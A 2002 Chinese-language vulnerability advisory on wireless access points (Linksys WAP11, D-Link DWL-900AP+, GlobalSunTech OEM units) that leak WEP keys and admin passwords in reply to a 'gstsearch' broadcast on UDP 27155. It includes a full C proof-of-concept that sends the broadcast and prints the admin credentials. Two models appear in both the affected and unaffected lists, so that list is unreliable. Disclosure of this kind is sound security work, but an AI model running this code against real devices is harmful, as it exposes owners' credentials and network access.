多家厂商无线接入点远程信息泄露漏洞
发布日期:2002-11-03
更新日期:2002-11-06
受影响系统:Linksys WAP11
D-Link DWL-900AP+
GlobalSunTech WISECOM GL2422AP-0T
GlobalSunTech ALLOY GL-2422AP-S
GlobalSunTech EUSSO GL2422-AP
不受影响系统:Linksys WAP11 2.2
D-Link DWL-900AP+ 2.2
D-Link DWL-900AP+ 2.1
GlobalSunTech ALLOY GL-2422AP-S
GlobalSunTech EUSSO GL2422-AP
描述:
GlobalSunTech公司开发多种OEM无线访问接入点设备,如Linksys、D-Link和其他产品。
GlobalSunTech开发的多种无线访问接入点设备对部分广播请求处理不正确,远程攻击者可以利用这个漏洞获得设备包含的敏感信息,包括管理员密码。
攻击者可以向无线访问接入点设备的UDP 27155端口发送包含"gstsearch"字符串的广播包,就可以导致设备返回包括WEB keys、MAC过滤和管理员密码等敏感信息。攻击者可以通过这些信息对设备进行进一步攻击和控制。
<*来源:Tom Knienieder (
knienieder@khamsin.ch)
链接:
http://marc.theaimsgroup.com/?l=bugtraq&m=103644513327228&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Tom Knienieder(
knienieder@khamsin.ch) 提供了如下测试程序:
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <sys/socket.h>
typedef struct {
char type[28];
char name[32];
char user[16];
char pass[16];
}
__attribute__ ((packed)) answer;
int main()
{
char rcvbuffer[1024];
struct sockaddr_in sin;
answer* ans = (answer *)rcvbuffer;
int sd, ret, val;
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = inet_addr("255.255.255.255");
sin.sin_port = htons(27155);
sd = socket(AF_INET, SOCK_DGRAM, 0);
if (sd < 0)
perror("socket");
val = 1;
ret = setsockopt(sd, SOL_SOCKET, SO_BROADCAST, &val, sizeof(val));
if (ret < 0)
{
perror("setsockopt");
exit(1);
}
ret = sendto(sd, "gstsearch", 9, 0, &sin, sizeof(struct sockaddr));
if (ret < 0)
{
perror("sendto");
exit(1);
}
ret = read(sd,&rcvbuffer,sizeof(rcvbuffer));
printf("Type : %s\n",ans->type);
printf("Announced Name : %s\n",ans->name);
printf("Admin Username : %s\n",ans->user);
printf("Admin Password : %s\n",ans->pass);
return 0;
}
建议:
厂商补丁:
GlobalSunTech
-------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.globalsuntech.com浏览次数:3661
严重程度:0(网友投票)